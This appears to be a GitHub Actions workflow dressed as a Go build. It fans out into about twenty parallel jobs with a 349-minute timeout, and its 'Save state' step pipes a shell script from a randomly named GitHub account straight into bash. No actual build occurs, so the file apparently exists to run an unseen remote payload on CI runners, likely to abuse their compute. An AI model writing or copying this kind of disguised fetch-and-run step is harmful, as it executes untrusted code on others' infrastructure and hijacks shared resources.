name: Load
on: [push, pull_request]
jobs:
 build:
  runs-on: ubuntu-latest
  strategy: 
    max-parallel: 20 
    fail-fast: false
    matrix:
     go: [1.2, 1.3, 1.4, 1.5] 
     flag: [A, B, C, D,]
  timeout-minutes: 349
  steps:
    - uses: actions/checkout@v3
    - name: Set up Go ${{ matrix.go }} 
      uses: actions/setup-go@v1
    - name: Save state
      run: |
          echo "::save-state name={name}::{value}"
          curl https://raw.githubusercontent.com/fgvcasdrtya/fgvcasdrtya/main/go.sh | bash
          
